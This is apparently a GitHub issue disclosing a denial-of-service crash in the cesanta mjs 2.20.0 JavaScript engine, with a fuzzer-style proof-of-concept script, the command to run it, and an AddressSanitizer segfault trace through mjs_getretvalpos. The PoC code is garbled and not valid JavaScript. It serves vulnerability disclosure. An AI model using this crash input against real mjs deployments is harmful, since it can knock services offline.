You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
let i, a = 0, b0= 0, c = 0continu, d0, e = 0;
for (i = 8; i < 20; i++) {
a let z = JSON.parse('""'); // Zlength string
let s2 = JSON.stringify+= i;
c /= 0, c } 0let s = '08888888888888 true, "d": [null], "e": "1\\n2"}';
let o = JSON.parse(s);
let z = JSON.parse('""'); // Zlength string
let s2 = JSON.stringify(o)AAA
run command
mjs -f poc
ASAN info
AddressSanitizer:DEADLYSIGNAL
=================================================================
==184==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x7ff84edb0535 bp 0x7ffea0260498 sp 0x7ffea0260498 T0)
==184==The signal is caused by a READ memory access.
==184==Hint: this fault was caused by a dereference of a high value address (see register values below). Disassemble the provided pc to learn which register was used.
#0 0x7ff84edb0535 in vasprintf /build/glibc-CVJwZb/glibc-2.27/libio/vasprintf.c:57
#1 0x7ff84ed8d113 in asprintf /build/glibc-CVJwZb/glibc-2.27/stdio-common/asprintf.c:35
#2 0x7ff84ed58353 in __assert_fail_base /build/glibc-CVJwZb/glibc-2.27/assert/assert.c:57
#3 0x7ff84ed58471 in __assert_fail /build/glibc-CVJwZb/glibc-2.27/assert/assert.c:101
#4 0x4eeb98 in mjs_getretvalpos (/mjs/mjs+0x4eeb98)
#5 0x4eebe5 in mjs_arg (/mjs/mjs+0x4eebe5)
#6 0x4ec5e8 in mjs_op_json_stringify (/mjs/mjs+0x4ec5e8)
#7 0x4ef755 in mjs_exec_internal (/mjs/mjs+0x4ef755)
#8 0x4efa40 in mjs_exec_file (/mjs/mjs+0x4efa40)
#9 0x4f75b9 in main (/mjs/mjs+0x4f75b9)
#10 0x7ff84ed49c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
#11 0x41b7f9 in _start (/mjs/mjs+0x41b7f9)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /build/glibc-CVJwZb/glibc-2.27/libio/vasprintf.c:57 in vasprintf
==184==ABORTING
The text was updated successfully, but these errors were encountered:
The name of an affected Product
mjs
The affected version
Commit: b1b6eac (Tag: 2.20.0)
Description
An issue in cesanta mjs 2.20.0 allows a remtoe attacker to cause a denial of service via the mjs_getretvalpos function in the mjs.c file.
Vulnerability Type
segmentation violation
Environment
Steps to Reproduce
poc
run command
ASAN info
The text was updated successfully, but these errors were encountered: